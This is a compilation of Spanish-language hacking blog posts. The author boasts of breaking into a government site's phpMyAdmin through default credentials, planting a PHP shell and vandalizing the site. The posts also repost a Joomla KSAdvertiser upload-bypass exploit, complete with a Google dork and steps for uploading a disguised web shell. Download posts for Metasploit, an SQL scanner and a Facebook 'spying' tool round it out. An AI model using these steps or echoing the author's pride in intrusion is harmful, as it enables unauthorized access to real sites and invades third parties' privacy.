Bitácora de un transeúnte: Phpmyadmin y sus inseguridades

Como muchos sabemos , phpmyadmin funciona como una aplicación capaz de ayudarnos a modificar y crear bases de datos MYSQL. Sin embargo como todo script, tiene sus pro y sus contra, aunque phpmyadmin este en su punto de popularidad, el hecho no corresponde a que sea muy seguro. Pero vamos,  que les pasa a esos programadores de ahora. Si uno busca versiones de phpmyadmin podremos encontrar  vulnerabilidades, pero no es algo fuera de lo normal , pasa en todo.

Se supone que constante mente se crean actualizaciones, debido a que los errores encontrados en el script en la próxima versión será parcheado o arreglado. Las actualizaciones en sí  corrigen los errores y/o vulnerabilidades, no solo cambian su imagen.

Una vez dicho la introducción, todo esto va a un punto. Como todo transeúnte, me encontré la administración de phpmyadmin de un sitio gubernamental de donde resido, llegue a buscar sus vulnerabilidades porque manejaban una versión muy antigua, estaba en busca de exploits para esa version en sitios como 0day , etc . Sin embargo,  de la nada , se me ocurrió dar a iniciar sesión, y pasó, sin poder creer,  pude acceder sin colocar ningún carácter en los campos de contraseña ni usuario, entonces esto quería decir que la contraseña era por defecto. En fin , pude accesar a la administración de phpmyadmin, ocupe instalar una shell para poder acceder a la pagina principal, puesto que la vulnerabilidad lo encontre en un subdominio, y ami me interesaba la pagina principal, una vez instalada la shellphp correcta obtuve el control total ,  y una ves hecho e instalada empece a hacer maldades como todos.

Moraleja: Actualicen sus aplicaciones y mas aquellas que ponen en riesgo la integridad del sitio, y por favor, no dejen nada por default, nos facilitan el trabajo, den un poco más de dificultad, a  uno le atrae más lo difícil. Saludos.

El mejor lenguaje de programación

Muchas personas que empiezan en el mundo de la informática pretenden aprender a programar, y para ello, indagan en la web para no cometer errores y encontrar un lenguaje de programación adecuado o simplemente "el mejor". Sin embargo, para contestar ¿Cuál es el mejor lenguaje de programación? te respondería  ¿Qué quieres hacer?

Pero si empezamos desde una respuesta menos compleja te podría decir, "Aprende Cualquiera" la lógica de programación en la mayoría de los lenguajes son similares, es decir, hablamos de variables, objetos, iteración, sentencias, etc. Esa es la esencia de los lenguajes de programación. De igual forma  lenguajes como "Python" son lenguajes que a nivel básico son mas fáciles de aprender, de hecho , en EUA , salió un reportaje donde mencionaban de escuelas donde enseñaban a programar en python , estamos hablando de niños de 10 años.

Entonces una ves respondiendo la pregunta "¿Qué quieres hacer?

Aplicaciones web, conexiones a DB,  aplicaciones, aplicaciones con interfaz gráfica , etc.

Es evidente que si tenemos como objetivo hacer una calculadora, es posible hacerlo en la mayoria de los lenguajes de programación , sin embargo , si ocupas de una interfaz gráfica es evidente que no todos los lenguajes fueron adaptadas para un interfaz gráfica , sino para programacion de tareas y su cumplimiento. Sin embargo VB, Net , C++ , JAVA, entre otros fueron adaptadas para la obtención de interfaz gráfica.

Si lo que ocupas es programación de páginas web, lo ideal pero no más seguro pero demandado es el lenguaje PHP, sin embargo existen  ASP, ASP .NET , PYTHON, etc.

Considerando todos los puntos, uno de las experiencias que he tomado , es que , las escuelas suelen impartir el conocimiento de programación con lenguajes C/C++,  he incluso java, debido a que tiene un sintaxis similar a la C++. Aunque los lenguajes C y sus evoluciones no son los más viejos , pero son los que mas popularidad tiene, !Ha de ser por algo!. Con esto empiezan abrirse la mente y empezar a tener conciencia de lo que se trata un lenguaje de programación y como se estructura.

La cuestión es aprender la esencia de la programación y no morir en el fracaso , sin embargo , aprender de lo más fácil te puede mal acostumbrar y empezaras a odiar los demás lenguajes, la idea es hacerse y complementarse  de cada uno, al final de todo sentarás cabeza en uno. Suerte.

Bitacora de un traúnsente: Capitulo 0

Esta sección son recopilaciones de historias la cual me han sido de mucha ayuda , como todo, la experiencia es la base de la sabiduría, puedes aprender todo lo teórico , pero a la guerra no vas con un libro, sino con el conocimiento. Yo carecía de apenas 15 años de edad y deje el mundo de la informática, me esta haciendo daño, mucho desvelos , e influía en mis calificaciones del colegio,y a pesar de que ando en esto desde los 11 años, nunca me creía un "niño prodigio".Me la pasaba vulnerando sitios, desarrollando programas el cual me facilitaban tareas cotidianas,manejaba lenguajes de programación de software, y aplicaciones web, ademas tenia  muchas ansias de enseñar lo que sabía, y para eso a los 14 años cree junto con amigos, SECURITY TRIALS enfocados en dar un inicio a las personas que quizás, el día de mañana sean grandes inventores o programadores.

Como toda persona , en busca de la fama , quería ser destacado en las noticias y ser conocido como "joven hacker" sin embargo , no sucedió. Y en mi intento de ganar ese nombre, empecé a buscar fallos en sitios gubernamentales, había batallado en busca de sitios para poner mi nombre, y hacerlo conocido, de igual forma como estos no eran de gran relevancia para las noticas, el vicio me gano, y empecé a hacer travesuras con muchos sitios con apenas 14 años , no me convenía hacerme público , entonces cree diferentes nicks para esconderme. y de todo esto , he logrado sacar esta sección el cual le dedico un tiempo, para comentar las experiencias , aunque sean fáciles, algunos , ni se las pasaba por la cabeza, el hacking, requiere de tiempo e imaginación. Saludos.

Happy hacking...

METASPLOIT FRAMEWORK [Download-Descargar]

 

 

  METASPLOIT FRAMEWORK

Es un proyecto open source de seguridad informática que proporciona información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración y en el desarrollo de firmas para Sistemas de Detección de Intrusos.

Su subproyecto más conocido es el Metasploit Framework, una herramienta para desarrollar y ejecutar exploits contra una máquina remota. Otros subproyectos importantes son la bases de datos de opcodes (códigos de operación), un archivo de shellcodes, e investigación sobre seguridad. Inicialmente fue creado utilizando el lenguaje de programación de scripting Perl, aunque actualmente el Metasploit Framework ha sido escrito de nuevo completamente en el lenguaje Ruby.

 

DESCARGA:

 LA DESCARGA ES GRATIUTA PARA OBTENER LA CONSOLA METASPLOIT , ES NECESARIO SOLO ENTRAR A LA PAGINA OFFICIAL DE METASPLOIT Y NO SACARLO DE LINKS EXTERNOS YA QUE ESTOS PUEDEN SER VIRUS QUE SE PROPAGAN DANDO MALA FAMA AL SOFTWARE..

ES POSIBLE ENCONTRAR ELSIGNIFICADO DE EXPLOITS & INSTRUCCIONES DE USO DE LOS PAYLOADS Y EXPLOITS ,  COMANDOS , E INFORMACION  ACERCA DE LA VULNERABILIDAD

EL LINK DOWNLOAD : http://www.metasploit.com/framework/download/

  

Joomla KISS Advertiser | Remote File & Bypass Upload Vulnerability |

############################################################################
# # Exploit Title: Joomla com_KSAdvertiser Remote File & Bypass Upload Vulnerability
# # Google Dork: inurl:index.php?option=com_ksadvertiser
# # Date: [12-07-2012]
#
# Author: Daniel Barragan
#
# Twitter: @D4NB4R<br>
# # site: http://www.insecurityperu.org/
#
# vendor Link: http://www.kiss-software.de
# # Tested on: [Linux(arch)-Windows(7ultimate)]
#
1. Some pages require the Register /     Registrese Algunas Paginas lo exigen

http://site/index.php?option=com_user&view=login

 2. Dirijase a la ruta del upload

http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en

 3. Vaya a imagenes y dele click a upload, examine su archivo shell.php y renombrelo a shell.php.gif


 4, Busque su archivo en la raiz
 /images/ksadvertiser/U0 --> esta puede variar
http://site/images/ksadvertiser/U0/403.php.gif

No me hago responsable del uso que selede
___________________________________________________________________________
Daniel Barragan "D4NB4R" Site: http://www.exploit-db.com // http://packetstormsecurity.org /
 FUENTE : http://www.exploit-db.com/exploits/19792/
 ______________________________________________________________________

WebCrusier-Scanner SQL

Plataforma:PC
Idioma:español,ingles
Formato: rar
tipo:scanner SQL
POST:YeiZeta

 

 

 

Espiar facebooks con Social Monitor

Plataforma:PC
Idioma:español,ingles
Formato: rar
POST:YeiZeta

 

¿Te preocupa lo que hacen tus hijos y otros parientes en Facebook? Social Monitor es una aplicación que te vendrá de perlas. Una vez que la hayas autorizado, Social Monitor vigilará las cuentas que desees en busca de noticias, palabras clave y fotos, y permitirá descargar esta información al disco duro.

Haz clic en Add child para añadir una cuenta a controlar. En el modo normal, debes autorizar Social Monitor en tu cuenta y tener a la otra persona en tu lista de amigos; para el modo completo, que incluye control del chat de Facebook, debes autorizar Social Monitor en las cuentas de tus hijos / parientes.

¿Listo para patrullar las cuentas de tus hijos? Presiona Check y Social Monitor llevará a cabo el análisis. Para cada perfil se muestran las actualizaciones de estado, su tipo y el estado. Si apareciese contenido sospechoso o palabras prohibidas -definidas de antemano-, las filas aparecerían en color rojo.

Para ahorrar tiempo, Social Monitor es una utilidad excelente. Sin embargo, aún quedan por pulir muchos aspectos de su funcionamiento, como la presencia de falsas alarmas y el método de escaneo, muy básico.